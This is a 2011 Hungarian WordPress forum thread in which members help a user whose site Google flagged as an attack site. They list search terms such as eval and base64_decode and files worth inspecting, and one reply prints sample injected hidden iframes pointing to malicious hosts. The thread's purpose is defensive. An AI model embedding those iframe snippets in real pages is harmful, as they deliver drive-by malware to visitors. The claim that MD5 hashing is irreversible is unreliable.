Sziasztok,
Ma reggelre bejelentett támadó webhellyé váltam, pedig tegnap még minden rendben volt, és nem is töltöttem fel semmit.
Mit tudok tenni, hogy ez megszűnjön?
Úgy sejtem, hogy vírus, de hogyan lehet a WP-ből kiszedni?
Mivel még semmi ilyesmi tapasztalatom nincs, ha tudtok segíteni, az sokat jelentene.
Köszönettel,
boresuta
3
Bejelentett támadó weboldal lettem :-( Mit tehetek?
Szerző boresuta, 2011-05-06 13:51 PM
8 válasz erre a témára
#2
-
- Adminisztrátor
-
- 1511 Hozzászólás:
Sötét WP Lovag
- Település:Budapest / Magyarország
Elküldve: 2011-05-06 - 15:23 PM
A helyzet az, hogy a google nem egyiknapról a másikra minősít át, hanem a probléma valószínűleg régóta fennállt, csak nem tűnt neked fel.
Nos, a megoldást három részre bontanám.
Az első a tűzoltás, vagyis megnézzük, hogy mi a gond, és ezt elhárítjuk. Általában egy bugos, hibás, vagy netán direkt erre a célra szánt sablonon keresztül, vagy FTP adatok eljutásával lehet ilyen csodás kártékony kódokat az oldaba juttatni, amit a google ilyen módon jelez.
Nézd meg az oldal forrását kritikus szemmel, hogy találhatóak-e benne ismeretlen domainekről JS és hasonló hívások, vagy olyan kódok, amikről fogalmad sincs, hogy az micsoda.
Én letölteném a teljes fent tárolt kód állományt, vagyis a tárhelyről mindent, kihagyva a wp-content/upload wp-content/blogs.dir wp-content-upgrade könyvtárakat, ha vannak.
Ezekben keress rá ezekre a kifejezésekre total commanderrel a következő szavakra:
Gyanus fájlok és könyvtárak a themes alkönyvtárban bárhol:
Ha találtunk olyan fájlt, amiben kártékony kód van, akkor a fájl módosítási idejét érdemes visszanézni, és hasonló időben módosult állományokat keressünk.
A .htaccess fájlt se hagyjuk ki az átnézés alól, ugyanis itt is lehetnek megbúvó kártékony dolgok, ezt folytassuk a wp-content/advanced-cache.php -val. Érdemes bekapcsolni a sor tördelést, ugyanis hajlamosak a kedves kártevők olyan helyre tenni a kódot, ami kicsúszik a szerkesztő ablakból, de attól még ott van.
A második lépés a miért kiderítése.
Valószínűleg, nem megbízható sablonból (aminek kódolt a footere, headere), vagy nem megbízható forrásból származó bővítménnyel, esetleg ellopott hozzáféréssel jutottak be. FTP jelszót cseréljünk mindenképpen. A használt, nem wordpress.org ról letöltött sablonokat, és bővítményeket nézzük át, hogy vannak-e kódolt részek benne (a wordpress.org-ra ilyen nem kerülhet fel, ezt szigorúan ellenőrzik).
Ha régi WordPress-t használunk, akkor frissítsük a legújabbra.
Nem utolsó sorban pedig nézzük át a felhasználókat, hogy képződtek-e új, magas jogosultsági szintű felhasználók, pl Site Admin, Admin.
Valamint, bár nem valószínű, hogy a jelszavunkat ellopták,( mivel a WordPress egyrészt MD5 hashelve tárolja a jelszavakat, ami egy nem visszafejthető algoritmus, plusz ehhez használ 2.8 óta egy titkosítást is) de azért adjunk meg egy új jelszót, csak úgy babonából.
A harmadik rész pedig, a felülvizsgálat, vagyis ha már meggyőződtünk az oldalról hogy tiszta, és mindent letakarítottunk, akkor a google webmastertools oldalon (https://www.google.c...bmasters/tools/) itt vegyük fel a domain nevünket, valamilyen módon a felajánlottak közül igazoljuk, hogy mi vagyunk a tulajok. Miután ez megtörtént a Diagnosztika > Ártalmas szoftverek oldalon tudunk felülvizsgálatot kérni (https://www.google.c...s/malware?hl=hu)
Nem rég szívtam hasonlóan egy oldallal, azért ilyen friss az élmény...
Nos, a megoldást három részre bontanám.
Az első a tűzoltás, vagyis megnézzük, hogy mi a gond, és ezt elhárítjuk. Általában egy bugos, hibás, vagy netán direkt erre a célra szánt sablonon keresztül, vagy FTP adatok eljutásával lehet ilyen csodás kártékony kódokat az oldaba juttatni, amit a google ilyen módon jelez.
Nézd meg az oldal forrását kritikus szemmel, hogy találhatóak-e benne ismeretlen domainekről JS és hasonló hívások, vagy olyan kódok, amikről fogalmad sincs, hogy az micsoda.
Én letölteném a teljes fent tárolt kód állományt, vagyis a tárhelyről mindent, kihagyva a wp-content/upload wp-content/blogs.dir wp-content-upgrade könyvtárakat, ha vannak.
Ezekben keress rá ezekre a kifejezésekre total commanderrel a következő szavakra:
- iframe
- eval
- base64_decode
- location.replace
- self.location
- urldecode
Gyanus fájlok és könyvtárak a themes alkönyvtárban bárhol:
- .xcache könyvtár (a pont-al jelölt könyvtárakat, nem biztos, hogy mutatja az ftp szerver)
- ttf könyvtár
- data.dat fájl
- foot.dat fájl
- template.tpl fájl
Ha találtunk olyan fájlt, amiben kártékony kód van, akkor a fájl módosítási idejét érdemes visszanézni, és hasonló időben módosult állományokat keressünk.
A .htaccess fájlt se hagyjuk ki az átnézés alól, ugyanis itt is lehetnek megbúvó kártékony dolgok, ezt folytassuk a wp-content/advanced-cache.php -val. Érdemes bekapcsolni a sor tördelést, ugyanis hajlamosak a kedves kártevők olyan helyre tenni a kódot, ami kicsúszik a szerkesztő ablakból, de attól még ott van.
A második lépés a miért kiderítése.
Valószínűleg, nem megbízható sablonból (aminek kódolt a footere, headere), vagy nem megbízható forrásból származó bővítménnyel, esetleg ellopott hozzáféréssel jutottak be. FTP jelszót cseréljünk mindenképpen. A használt, nem wordpress.org ról letöltött sablonokat, és bővítményeket nézzük át, hogy vannak-e kódolt részek benne (a wordpress.org-ra ilyen nem kerülhet fel, ezt szigorúan ellenőrzik).
Ha régi WordPress-t használunk, akkor frissítsük a legújabbra.
Nem utolsó sorban pedig nézzük át a felhasználókat, hogy képződtek-e új, magas jogosultsági szintű felhasználók, pl Site Admin, Admin.
Valamint, bár nem valószínű, hogy a jelszavunkat ellopták,( mivel a WordPress egyrészt MD5 hashelve tárolja a jelszavakat, ami egy nem visszafejthető algoritmus, plusz ehhez használ 2.8 óta egy titkosítást is) de azért adjunk meg egy új jelszót, csak úgy babonából.
A harmadik rész pedig, a felülvizsgálat, vagyis ha már meggyőződtünk az oldalról hogy tiszta, és mindent letakarítottunk, akkor a google webmastertools oldalon (https://www.google.c...bmasters/tools/) itt vegyük fel a domain nevünket, valamilyen módon a felajánlottak közül igazoljuk, hogy mi vagyunk a tulajok. Miután ez megtörtént a Diagnosztika > Ártalmas szoftverek oldalon tudunk felülvizsgálatot kérni (https://www.google.c...s/malware?hl=hu)
Nem rég szívtam hasonlóan egy oldallal, azért ilyen friss az élmény...
#3
-
- Adminisztrátor
-
- 1530 Hozzászólás:
WordPress Térítő
- Település:Dunakeszi
Elküldve: 2011-05-06 - 15:30 PM
Korábban írtam róla: http://hoppare.com/b...do-webhely.html
Hoppare | WordPress
Az informatikában nincsenek titkok, csak két dolog kell megtanulni: 1. Olvasni 2. Google-t használni.
Tolerancia és tisztelet - ide egymástól tanulni járunk!
Az informatikában nincsenek titkok, csak két dolog kell megtanulni: 1. Olvasni 2. Google-t használni.
Tolerancia és tisztelet - ide egymástól tanulni járunk!
#5
-
- Regisztrált tag
-
- 290 Hozzászólás:
Törzstag
- Település:Kecskemét a Mercédesz város
Elküldve: 2011-05-06 - 15:33 PM
Szervusz!
Első lépésként én letőlteném ftp-n a teljes wordpress-t.
Második lépésként, átnézném a teljes sablon állományt ami .php kiterjesztésű.
Szokatlan kódokat keresnék benne. pl.:
Álltalában a header.php vagy footer.php fájlokban érdemes keresni az ártalmas kódot!
Ha megtaláltam a "furcsa" kódot, akkor bejelenteném a Google Webmaster Tools az alábbi módon:
hozzáadom az eszköztárhoz az adott oldalt és Felülvizsgálat kérelmezése… (Webmester eszköztár jobb oldalt)
Egyenlőre ennyit tudok segíteni! Napok kérdése mig visszaáll! Viszont ha nem sikerül, vedd fel velem a kapcsolatot!
Első lépésként én letőlteném ftp-n a teljes wordpress-t.
Második lépésként, átnézném a teljes sablon állományt ami .php kiterjesztésű.
Szokatlan kódokat keresnék benne. pl.:
<iframe src="http://b1a.ru:8080/index.php" width=142 height=172 style="visibility: hidden"></iframe> <IFRAME SRC="http://shopmovielife.cn:8080/index.php" STYLE="visibility: hidden;" HEIGHT="189" WIDTH="147"></iframe> http://razorstudio.org/advtds/out.php?s_id=1stb...
Álltalában a header.php vagy footer.php fájlokban érdemes keresni az ártalmas kódot!
Ha megtaláltam a "furcsa" kódot, akkor bejelenteném a Google Webmaster Tools az alábbi módon:
hozzáadom az eszköztárhoz az adott oldalt és Felülvizsgálat kérelmezése… (Webmester eszköztár jobb oldalt)
Egyenlőre ennyit tudok segíteni! Napok kérdése mig visszaáll! Viszont ha nem sikerül, vedd fel velem a kapcsolatot!
KardiWeb | Weboldal készítés | Ingyen WordPress Tárhely | Ingyenes Weboldal Mérés | WP Megosztás 1.5.1
#7
-
- VIP tag
-
- 1418 Hozzászólás:
Fórumfüggő
Elküldve: 2011-05-09 - 19:59 PM
Itt egy plugin is akár, ami segíthet a keresésben. http://ocaoimh.ie/exploit-scanner/
Ha egy hozzászólásom hasznosnak találod, akkor az adott hsz jobb alsó sarkában kattints a "Köszi" gombra!
Vízipipa fórum ~ Vízipipa Blog
Vízipipa fórum ~ Vízipipa Blog
#8
-
- Regisztrált tag
-
- 122 Hozzászólás:
Új Tag
Elküldve: 2011-05-12 - 11:34 AM
Köszönöm szépen mindannyiótok segítségét!
#9
-
- Regisztrált tag
-
- 54 Hozzászólás:
Új Tag
- Település:Pécs
Elküldve: 2011-05-30 - 11:35 AM
Én is ezzel küzdök most több oldalamnál. A szolgáltató log-olása szerint jelszólopás esete forgott fenn, valami külföldi IP-ről jött valaki, aki módosította az index.php file-okat. Meg még mást is szerintem, még küzdök vele... 
1 felhasználó olvassa ezt a témát.
0 felhasználó, 1 vendég, 0 anonim felhasználó
